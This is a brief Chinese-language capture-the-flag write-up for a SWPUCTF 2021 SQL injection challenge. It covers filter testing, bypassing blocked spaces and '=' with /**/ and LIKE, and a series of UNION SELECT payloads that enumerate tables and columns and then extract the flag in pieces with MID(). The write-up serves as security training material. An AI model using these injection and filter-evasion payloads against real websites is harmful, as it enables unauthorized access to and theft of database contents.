Problem: [SWPUCTF 2021 新生赛]sql
思路
- 首先测试一下过滤吧
-
?wllm=1' 报错 -
?wllm=1'--+ 非法操作
把--+换成'或者%23可正常回显 然后再去测试一些 可以知道过滤了空格和=(感觉一般都是这俩)然后
空格换成/**/
=换成like
知道是三列,知道回显23后,开始注入
'/**/union/**/select/**/1,2,database()%23
'/**/union/**/select/**/1,2,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database())%23
'/**/union/**/select/**/1,2,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'LTLT_flag')%23
'/**/union/**/select/**/1,2,(select/**/group_concat(flag)/**/from/**/LTLT_flag)/**/'
嗯嗯结果只回显了一部分 被截取了 只能回显一部分 也懒得测试了 直接看wp 用mid就可以(substr,right,REVERSE被过滤)
'/**/union/**/select/**/1,2,(select/**/mid(group_concat(flag),21,40)/**/from/**/LTLT_flag)/**/%23
一开始截取的是1-20 现在这行写21-40即可 然后再换41-60 就拿到完整flag
- 对该题的考点总结